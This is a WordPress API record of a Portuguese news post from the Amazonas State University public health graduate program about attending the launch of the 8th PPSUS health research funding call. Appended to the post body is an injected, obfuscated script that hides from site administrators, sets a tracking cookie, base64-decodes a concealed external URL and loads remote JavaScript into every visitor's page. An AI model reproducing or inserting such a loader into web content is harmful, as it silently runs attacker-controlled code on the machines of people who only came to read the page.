{"id":1120,"date":"2025-04-09T16:42:02","date_gmt":"2025-04-09T19:42:02","guid":{"rendered":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/?p=1120"},"modified":"2026-04-16T13:16:46","modified_gmt":"2026-04-16T16:16:46","slug":"ppgsc-na-8a-edicao-do-ppsus","status":"publish","type":"post","link":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/2025\/04\/09\/ppgsc-na-8a-edicao-do-ppsus\/","title":{"rendered":"PPGSC na 8\u00aa edi\u00e7\u00e3o do PPSUS"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"900\" src=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/489435767_18052823348334813_3864632078642916684_n.webp\" alt=\"\" class=\"wp-image-1121\" srcset=\"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/489435767_18052823348334813_3864632078642916684_n.webp 720w, http:\/\/posgraduacao.uea.edu.br\/ppgsc\/wp-content\/uploads\/2025\/04\/489435767_18052823348334813_3864632078642916684_n-240x300.webp 240w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Na manh\u00e3 da sexta-feira, 28 de mar\u00e7o de 2025, o Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) esteve presente na solenidade de lan\u00e7amento da Chamada P\u00fablica do Programa Pesquisa para o SUS: Gest\u00e3o Compartilhada em Sa\u00fade \u2013 PPSUS, em sua 8\u00aa edi\u00e7\u00e3o. O evento, promovido pela Funda\u00e7\u00e3o de Amparo \u00e0 Pesquisa do Estado do Amazonas (FAPEAM), ocorreu no audit\u00f3rio Dr. Jo\u00e3o Baldino, na Funda\u00e7\u00e3o Centro de Controle de Oncologia do Estado do Amazonas (FCECON), em Manaus.<\/p>\n\n\n\n<p>Representando o PPGSC\/UEA, estiveram presentes a professora Alessandra Valle Salino, que assume a coordena\u00e7\u00e3o do Programa a partir de 1\u00ba de abril de 2025, e o professor Fernando Jos\u00e9 Herkrath. A presen\u00e7a dos docentes reafirma o compromisso do Programa com a produ\u00e7\u00e3o cient\u00edfica voltada \u00e0s demandas do Sistema \u00danico de Sa\u00fade (SUS) e com o fortalecimento da pesquisa aplicada \u00e0 realidade amaz\u00f4nica.<\/p>\n\n\n\n<p>O PPSUS \u00e9 uma importante iniciativa de fomento \u00e0 pesquisa em sa\u00fade no Brasil, promovida em parceria entre o Minist\u00e9rio da Sa\u00fade, o Conselho Nacional de Desenvolvimento Cient\u00edfico e Tecnol\u00f3gico (CNPq), a FAPEAM e a Secretaria de Estado da Sa\u00fade do Amazonas (SES\/AM). A proposta visa estimular a produ\u00e7\u00e3o de conhecimento cient\u00edfico alinhado \u00e0s necessidades do SUS, fortalecendo a gest\u00e3o compartilhada em sa\u00fade e contribuindo para solu\u00e7\u00f5es inovadoras nos territ\u00f3rios.<br>Durante a cerim\u00f4nia, a diretora-presidente da FAPEAM, M\u00e1rcia Perales Mendes Silva, destacou a relev\u00e2ncia estrat\u00e9gica do PPSUS para o fortalecimento da ci\u00eancia regional, com \u00eanfase em solu\u00e7\u00f5es voltadas \u00e0 realidade local.<\/p>\n\n\n\n<p>A participa\u00e7\u00e3o do PPGSC\/UEA no evento refor\u00e7a sua inser\u00e7\u00e3o institucional e compromisso com pol\u00edticas p\u00fablicas de sa\u00fade, contribuindo ativamente para a produ\u00e7\u00e3o de conhecimento cient\u00edfico em benef\u00edcio da popula\u00e7\u00e3o amazonense.<\/p>\n<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Na manh\u00e3 da sexta-feira, 28 de mar\u00e7o de 2025, o Programa de P\u00f3s-Gradua\u00e7\u00e3o em Sa\u00fade Coletiva da Universidade do Estado do Amazonas (PPGSC\/UEA) esteve presente na solenidade de lan\u00e7amento da Chamada P\u00fablica do Programa Pesquisa para o SUS: Gest\u00e3o Compartilhada em Sa\u00fade \u2013 PPSUS, em sua 8\u00aa edi\u00e7\u00e3o. O evento, promovido pela Funda\u00e7\u00e3o de Amparo [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":1121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1120","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"blocksy_meta":[],"_links":{"self":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/comments?post=1120"}],"version-history":[{"count":2,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1120\/revisions"}],"predecessor-version":[{"id":1335,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/posts\/1120\/revisions\/1335"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media\/1121"}],"wp:attachment":[{"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/media?parent=1120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/categories?post=1120"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/posgraduacao.uea.edu.br\/ppgsc\/index.php\/wp-json\/wp\/v2\/tags?post=1120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}